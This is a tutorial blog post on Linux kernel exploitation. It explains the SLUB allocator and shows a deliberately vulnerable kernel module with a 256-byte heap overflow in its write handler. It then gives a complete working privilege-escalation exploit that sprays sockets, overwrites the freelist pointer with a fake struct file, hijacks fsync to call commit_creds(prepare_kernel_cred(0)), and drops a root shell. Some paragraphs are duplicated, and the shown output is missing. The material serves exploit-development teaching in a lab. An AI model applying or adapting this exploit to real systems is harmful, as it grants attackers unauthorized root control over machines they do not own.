1. Introduction :
in recent years , several researches on the Linux kernel security were done . The most common kernel privilege vulnerabilities can be divided into several categories: NULL pointer dereference , kernel space stack overflow ,kernel slab overflow , race conditions ... etc.
some of them are pretty easy to exploit and no need to prepare your own linux kernel debugging environment to write the exploit, and some other requires some special knowledges on Linux kernel design , routines , memory management ... etc .
In this tutorial we will explain how SLUB allocator works and how we can make our user-land code to be executed when we can corrupt some metadata from a slab allocator .
2. The Slab Allocator :
The Linux kernel has three main different memory allocators: SLAB, SLUB, and SLOB.
I would note that “slab” means the general allocator design, while SLAB/SLUB/SLOB are slab implementations in the Linux kernel.
And you can use only one of them; by default, Linux kernel uses the SLUB allocator, since 2.6 is a default memory manager when a Linux kernel developer calls kmalloc().
So let’s talk a little bit about these three implementations and describe how they work.
The Linux kernel has three main different memory allocators: SLAB, SLUB, and SLOB.
I would note that “slab” means the general allocator design, while SLAB/SLUB/SLOB are slab implementations in the Linux kernel.
And you can use only one of them; by default, Linux kernel uses the SLUB allocator, since 2.6 is a default memory manager when a Linux kernel developer calls kmalloc().
So let’s talk a little bit about these three implementations and describe how they work.
2.1. SLAB allocator:
The SLAB is a set of one or more contiguous pages of memory handled by the slab allocator for an individual cache. Each cache is responsible for a specific kernel structure allocation. So the SLAB is set of object allocations of the same type.
The SLAB is described with the following structure:
The SLAB is a set of one or more contiguous pages of memory handled by the slab allocator for an individual cache. Each cache is responsible for a specific kernel structure allocation. So the SLAB is set of object allocations of the same type.
The SLAB is described with the following structure:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 | struct slab { union { struct { struct list_head list; unsigned long colouroff; void *s_mem; unsigned int inuse; /* num of used objects */ kmem_bufctl_t free; unsigned short nodeid; }; struct slab_rcu __slab_cover_slab_rcu; }; }; |
For example, if you make two allocations of tasks_struct using kmalloc, these two objects are allocated in the same SLAB cache, because they have the same type and size.
Two pages with six objects in the same type handled by a slab cache
2.2. SLUB allocator:
SLUB is currently the default slab allocator in the Linux kernel. It was implemented to solve some drawbacks of the SLAB design.
The following figure includes the most important members of the page structure. (Look here to see the full version.)
SLUB is currently the default slab allocator in the Linux kernel. It was implemented to solve some drawbacks of the SLAB design.
The following figure includes the most important members of the page structure. (Look here to see the full version.)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 | struct page { ... struct { union { pgoff_t index; /* Our offset within mapping. */ void *freelist; /* slub first free object */ }; ... struct { unsigned inuse:16; unsigned objects:15; unsigned frozen:1; }; ... }; ... union { ... struct kmem_cache *slab; /* SLUB: Pointer to slab */ ... }; ... }; |
A page’s freelist pointer is used to point to the first free object in the slab. This first free object has another small header, which has another freelist pointer that points to the next free object in the slab, while inuse is used to track of the number of objects that have been allocated. The figure illustrates that:
The SLUB ALLOCATOR: linked list between free objects.
The SLUB allocator manages many of dynamic allocations/deallocations of the internal kernel memory. The kernel distinguishes these allocations/deallocations by their sizes;
some caches are called general-purpose (kmalloc-192: it holds allocations between 128 and 192 bytes). For example, if you invoke kmalloc to allocate 50 bytes, it creates the chunk of memory from the general-purpose kmalloc-64, because 50 is between 32 and 64.
For more details, you can type “cat /proc/slabinfo.”
/proc/slabinfo has no longer readable by a simple user …, so you should work with the super-user when writing exploits.
2.3. SLOB allocator:
The SLOB allocator was designed for small systems with limited amounts of memory, such as embedded Linux systems.
SLOB places all allocated objects on pages arranged in three linked lists.
3.Kernel SLUB overflow :
Exploiting SLUB overflows requires some knowledges about the SLUB allocator (we’ve described it above) and it is one of the most advanced exploitation techniques.
Keep in mind that objects in a slab are allocated contiguously so, if we can overwrite the metadata used by the SLUB allocator, we can switch the execution flow into the user space and execute our evil code. So our goal is to control the freelist pointer, The freelist pointer, as described above, is a pointer to the next free object in the slab cache. If freelist is NULL, the slab is full, no more free objects are available, and the kernel asks for another slab cache with PAGE_SIZE of bytes (PAGE_SIZE=4096). If we overwrite this pointer with an address of our choice, we can return to a given kernel path an arbitrary memory address (user-land code).
So let’s make a small demonstration and look at this in more practical way. I’ve built a vulnerable device driver that does some trivial input/output interactions with userland processes.
The code:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 | #include <linux/init.h> #include <linux/module.h> #include <linux/uaccess.h> #include <linux/cdev.h> #include <linux/fs.h> #include <linux/slab.h> #define DEVNAME "vuln" #define MAX_RW (PAGE_SIZE*2) MODULE_AUTHOR("Mohamed Ghannam"); MODULE_LICENSE("GPL v2"); static struct cdev *cdev; static char *ramdisk; static int vuln_major = 700,vuln_minor = 3; static dev_t first; static int count = 1; static int vuln_open_dev(struct inode *inode , struct file *file) { static int counter=0; char *ramdisk; printk(KERN_INFO"opening device : %s \n",DEVNAME); ramdisk = kzalloc(MAX_RW,GFP_KERNEL); if(!ramdisk) return -ENOMEM; //file->private_data = ramdisk; printk(KERN_INFO"MAJOR no = %d and MINOR no = %d\n",imajor(inode),iminor(inode)); printk(KERN_INFO"Opened device : %s\n",DEVNAME); counter++; printk(KERN_INFO"opened : %d\n",counter); return 0; } static int vuln_release_dev(struct inode *inode,struct file *file) { printk(KERN_INFO"closing device : %s \n",DEVNAME); return 0; } static ssize_t vuln_write_dev(struct file *file ,const char __user *buf,size_t lbuf,loff_t *ppos) { int nbytes,i; char *copy; char *ramdisk = kzalloc(lbuf,GFP_KERNEL); if(!ramdisk) return -ENOMEM; copy = kmalloc(256 , GFP_KERNEL); if(!copy) return -ENOMEM; if ((lbuf+*ppos) > MAX_RW) { printk(KERN_WARNING"Write Abbort \n"); return 0; } nbytes = lbuf - copy_from_user(ramdisk+ *ppos , buf,lbuf); ppos += nbytes; for(i=0;i<0x40;i++) copy[i]=0xCC; memcpy(copy,ramdisk,lbuf); printk("ramdisk : %s \n",ramdisk); printk("Writing : bytes = %d\n",(int)lbuf); return nbytes; } static ssize_t vuln_read_dev(struct file *file ,char __user *buf,size_t lbuf ,loff_t *ppos) { int nbytes; char *ramdisk = file->private_data; if((lbuf + *ppos) > MAX_RW) { printk(KERN_WARNING"Read Abort \n"); return 0; } nbytes = lbuf - copy_to_user(buf,ramdisk + *ppos , lbuf); *ppos += nbytes; return nbytes; } static struct file_operations fps = { .owner = THIS_MODULE, .open = vuln_open_dev, .release = vuln_release_dev, .write = vuln_write_dev, .read = vuln_read_dev, }; static int __init vuln_init(void) { ramdisk = kmalloc(MAX_RW,GFP_KERNEL); first = MKDEV(vuln_major,vuln_minor); register_chrdev_region(first,count,DEVNAME); cdev = cdev_alloc(); cdev_init(cdev,&fps); cdev_add(cdev,first,count); printk(KERN_INFO"Registring device %s\n",DEVNAME); return 0; } static void __exit vuln_exit(void) { cdev_del(cdev); unregister_chrdev_region(first,count); kfree(ramdisk); } module_init(vuln_init); module_exit(vuln_exit); |
Let’s describe a little bit what the code does: This is a dummy kernel model that creates a character device, “/dev/vuln,” and makes some basic I/O operations. The bug is obvious to spot. In the vuln_write_dev() function, we notice that the ramdisk variable is used to store the user input and it’s allocated safely with lbuf, which is the length of user input. Then it will be copied into the copy variable, which is kmalloc’ed with 256 bytes. So it is easy to spot that there is a heap SLUB overflow if a user writes data greater in size than 256 bytes. First you should download the lab of this article. It is a qemu archive system containing the kernel module, the proof of concept, and the final exploit. Let’s trigger the bug first:
So we’ve successfully overwritten the freelist pointer for the next free object.
If we overwrite this freelist metadata with the address of a userland function, we can run our userland function inside the kernel space; thus we can hijack root privileges and drop the shell after.
I forgot to mention that there are three categories of the slab caches: full slab, partial slab, and empty slab.
- Full slab: The slab cache is fully allocated and doesn’t contain any free chunks so its freelist equals NULL.
- Partial slab: The slab cache contains free and allocated chunks and is able to allocate other chunks.
- Empty slab: The slab cache doesn’t have any allocation, so all chunks are free and ready to be allocated.
4.Exploitation:
So the problem is that, when the attacker wants to overwrite a freelist pointer, he must take care of the slab’s situation and it should be either a full slab or an empty slab. He also needs to make sure that the next freelist pointer is the right target.
So we have 256 bytes allocated with kmalloc, so we should take a look at /proc/slabinfo and gather some useful information about the general-purpose kmalloc-256. The next step is to make a comparison between the free objects and used objects in the slab cache and then we have to fill them and make the slab full to ensure that the kernel will create a fresh slab.
To do that we have to figure out some ways to make allocations in the general purpose “kmalloc-256,”, and we find that a good target for this is struct file kernel structure. Since we can’t allocate it directly from the user space, we can do it by calling some syscalls to do it for us, such as open(), socket(), etc.
Calling these kinds of functions allows us to make some struct file allocations and that’s good for an attacker’s purpose.
As we described earlier, we should ensure that there are no more free chunks for the current slab, so we have to make a lot of struct file allocations:
1 2 | for(i=0;i<1000;i++) socket(AF_INET,SOCK_STREAM,0); |
Good, so take a look again at the slab cache. The next thing to do is to trigger the crash. If we write an amount of data greater than 256 bytes, we will definitely overwrite the next free list pointer to let the kernel execute some userspace codes of our choice. So how does the userland code get to be executed in the kernel land ? We have to look for function pointers and we are glad to see that struct file contains struct file_operations containing a function pointer. Our attack is shown below:
1 2 3 4 5 | struct file { .f_op = struct file_operations = { .fsync = ATTACKER_ADDRESS, }; }; |
As you see, you there are a lot of function pointers and you can choose any one you want. But how can we put this “ATTACKER_ADDRESS” ? The idea is to build a new fake struct file and put its address in the payload, so the freelist will be overwritten by the address of our fake struct file; thus the freelist points into our fake struct file and it assumes that it’s the next free object, so we are moving the control flow into the userspace. This is a powerful technique. When the attacker calls fsync(2) syscall, the ATTACKER_ADDRESS will be executed instead of the real fsync operation. Good, so we can execute our userland code, but how can we get root privileges ? It’s very easy to get root by calling:
1 | commit_creds(prepare_kernel_cred(0));
|
The final exploit is like this:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 | #include <arpa/inet.h> #include <errno.h> #include <fcntl.h> #include <netinet/in.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/ipc.h> #include <sys/mman.h> #include <sys/shm.h> #include <sys/socket.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/utsname.h> #include <unistd.h> #define BUF_LEN 256 struct list_head { struct list_head *prev,*next; }; struct path { void *mnt; void *dentry; }; struct file_operations { void *owner; void *llseek; void *read; void *write; void *aio_read; void *aio_write; void *readdir; void *poll; void *unlocked_ioctl; void *compat_ioctl; void *mmap; void *open; void *flush; void *release; void *fsync; void *aio_fsync; void *fasync; void *lock; void *sendpage; void *get_unmapped_area; void *check_flags; void *flock; void *splice_write; void *splice_read; void *setlease; void *fallocate; void *show_fdinfo; } op; struct file { struct list_head fu_list; struct path f_path; struct file_operations *f_op; long int buf[1024]; } file; typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; int win=0; static unsigned long get_kernel_sym(char *name) { FILE *f; unsigned long addr; char dummy; char sname[512]; struct utsname ver; int ret; int rep = 0; int oldstyle = 0; f = fopen("/proc/kallsyms", "r"); if (f == NULL) { f = fopen("/proc/ksyms", "r"); if (f == NULL) goto fallback; oldstyle = 1; } repeat: ret = 0; while(ret != EOF) { if (!oldstyle) ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); else { ret = fscanf(f, "%p %s\n", (void **)&addr, sname); if (ret == 2) { char *p; if (strstr(sname, "_O/") || strstr(sname, "_S.")) continue; p = strrchr(sname, '_'); if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) { p = p - 4; while (p > (char *)sname && *(p - 1) == '_') p--; *p = '\0'; } } } if (ret == 0) { fscanf(f, "%s\n", sname); continue; } if (!strcmp(name, sname)) { printf("[+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : ""); fclose(f); return addr; } } fclose(f); if (rep) return 0; fallback: /* didn't find the symbol, let's retry with the System.map dedicated to the pointlessness of Russell Coker's SELinux test machine (why does he keep upgrading the kernel if "all necessary security can be provided by SE Linux"?) */ uname(&ver); if (strncmp(ver.release, "2.6", 3)) oldstyle = 1; sprintf(sname, "/boot/System.map-%s", ver.release); f = fopen(sname, "r"); if (f == NULL) return 0; rep = 1; goto repeat; } int getroot(void) { win=1; commit_creds(prepare_kernel_cred(0)); return -1; } int main(int argc,char ** argv) { char *payload; int payload_len; void *ptr = &file; payload_len = 256+9; payload = malloc(payload_len); if(!payload){ perror("malloc"); return -1; } memset(payload,'A',payload_len); memcpy(payload+256,&ptr,sizeof(ptr)); payload[payload_len]=0; int fd = open("/dev/vuln",O_RDWR); if(fd == -1) { perror("open "); return -1; } commit_creds = (_commit_creds)get_kernel_sym("commit_creds"); prepare_kernel_cred = (_prepare_kernel_cred)get_kernel_sym("prepare_kernel_cred"); int i; for(i=0;i<1000;i++){ if(socket(AF_INET,SOCK_STREAM,0) == -1){ perror("socket fill "); return -1; } } write(fd,payload,payload_len); int target_fd ; target_fd = socket(AF_INET,SOCK_STREAM,0); target_fd = socket(AF_INET,SOCK_STREAM,0); file.f_op = &op; op.fsync = &getroot; fsync(target_fd); pid_t pid = fork(); if (pid == 0) { setsid(); while (1) { sleep(9999); } } printf("[+] rooting shell ...."); close(target_fd); if(win){ printf("OK\n[+] Droping root shell ... \n"); execl("/bin/sh","/bin/sh",NULL); }else printf("FAIL \n"); return 0; } |
Let’s run the code:
GOT root ? yes ..
5. Conclusion:
We have studied how the kernel SLUB works and how we can get privileges. Exploiting kernel vulnerabilities is not so different than userspace, but the kernel exploit development requires strong knowledge of how the kernel works, its routines, how it protects against race conditions, etc.
It was very fun to play with these kind of bugs, as there are not a whole lot of modern, public example s of SLUB overflow exploits.
some references that might help you:
Linux Kernel CAN SLUB Overflow
A Guide to Kernel Exploitation: Attacking the Core
Exploit Linux Kernel Slub Overflow
w3challs kernelpanics secion
Great, Thanks !
RépondreSupprimer